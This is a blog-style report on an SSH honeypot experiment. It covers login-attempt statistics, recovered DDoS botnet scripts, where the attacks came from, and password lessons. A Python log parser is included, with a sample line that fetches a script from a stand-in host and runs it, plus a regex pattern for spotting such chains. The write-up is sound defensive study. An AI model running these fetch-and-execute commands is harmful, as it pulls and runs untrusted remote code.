The Honeypot Project

The protection of information is crucial. However, protecting information is not easy. Recently, Uber disclosed that hackers accessed personal information of 57 million riders and drivers last year, and Equifax admitted that 145.5 million names, social security numbers, addresses and driver's license numbers were extracted from their website.

I set up a honeypot to see what a successful attacker does once inside a system; my focus was not on preventing breaches. I chose the honeypot Cowrie, an extension of the popular SSH honeypot Kippo. I picked Cowrie for two reasons: its simplicity and its effectiveness. I predicted that an SSH server would be more likely to attract traffic from bots and hackers than a web server or database. Here is what I found:

I was attacked quickly. I spun up the server on November 22, 2017, at 9:30 p.m. The first unauthorized login attempt was at 4:01 a.m. the next morning. Less than eight hours after starting my server, it had already been attacked.

I also received many login attempts in a short amount of time. So far, I've received 49,770 login attempts using 1,191 different passwords. Some of the bots were more persistent than others, trying hundreds of password combinations with a variety of usernames. You can view the username frequency for all login attempts (as of November 30, 2017) here. You can view the password frequency for all login attempts (as of November 30, 2017) here.

I found three different scripts that attackers tried to run on my system. All of them were written in Perl and followed the same basic pattern:

wget [MALICIOUS SCRIPT]; perl [MALICIOUS SCRIPT]; rm [MALICIOUS SCRIPT]

I was able to recover two of the scripts; both were DDoS botnet scripts. The attackers' neglect in covering their tracks surprised me: though they deleted the scripts, the commands remained easily viewable in any logging software. In addition, there were 16,588 attempts to create a direct TCP connection to my server (although most were carried out by a few bots).
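As an added example (not part of the original post or of Cowrie itself), here is a small Python script that tallies the usernames and passwords tried against a Cowrie honeypot, counts direct TCP connection requests, and flags the fetch/run/delete command chain shown above. It assumes Cowrie's JSON log format (eventid, src_ip, username, password, input fields); the log lines are constructed, not real captures.

```python
import json
import re
from collections import Counter

# Constructed sample of Cowrie JSON log lines (not real captures). Field names
# follow Cowrie's cowrie.json output: eventid, src_ip, username, password, input.
SAMPLE_LOG = """
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.7", "username": "root", "password": "123456"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.7", "username": "root", "password": "admin"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.9", "username": "admin", "password": "admin"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.9", "username": "pi", "password": "raspberry"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.9", "input": "wget http://example.invalid/x.pl; perl x.pl; rm x.pl"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.9", "input": "uname -a"}
{"eventid": "cowrie.direct-tcpip.request", "src_ip": "198.51.100.7", "dst_ip": "192.0.2.1", "dst_port": 25}
"""

# The fetch/run/delete chain from the post: a download tool, then an
# interpreter, then rm, all chained on one command line.
FETCH_RUN_DELETE = re.compile(
    r"\b(wget|curl)\b.*;\s*(perl|sh|bash|python)\b.*;\s*rm\b", re.IGNORECASE)


def parse_events(text):
    """Yield one dict per JSON line; blank and malformed lines are skipped."""
    for line in text.splitlines():
        try:
            if line.strip():
                yield json.loads(line)
        except json.JSONDecodeError:
            continue


def summarize(text):
    """Tally usernames/passwords tried, direct-TCP forward requests, and
    any command matching the fetch/run/delete pattern (with its source IP)."""
    usernames, passwords = Counter(), Counter()
    tcp_requests, flagged = 0, []
    for ev in parse_events(text):
        kind = ev.get("eventid", "")
        if kind in ("cowrie.login.failed", "cowrie.login.success"):
            usernames[ev.get("username", "")] += 1
            passwords[ev.get("password", "")] += 1
        elif kind == "cowrie.command.input":
            if FETCH_RUN_DELETE.search(ev.get("input", "")):
                flagged.append((ev.get("src_ip"), ev["input"]))
        elif kind == "cowrie.direct-tcpip.request":
            tcp_requests += 1
    return {"usernames": usernames, "passwords": passwords,
            "tcp_requests": tcp_requests, "flagged": flagged}
```

Pointing `summarize` at the contents of a real cowrie.json gives the username and password frequency tables the post links to; `most_common()` on either Counter ranks them.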

The attacks came from around the world. The top five origin countries for the traffic were:

  1. Russia (32,549)
  2. France (3,525)
  3. China (1,713)
  4. Brazil (764)
  5. Greece or Italy* (307 - 1,122)
    *the exact country couldn't be specified

These locations are likely inaccurate, as attackers usually hide their origin. Nevertheless, this data provides insight into which countries attackers can launch attacks from with little risk.

I am taking away two things from this project. The first is that security through obscurity does not work: the number of attacks on an SSH server without a domain name went far beyond my expectations. The second is that the best security comes from smart users: strong passwords and non-default usernames would have protected the server from every attack.
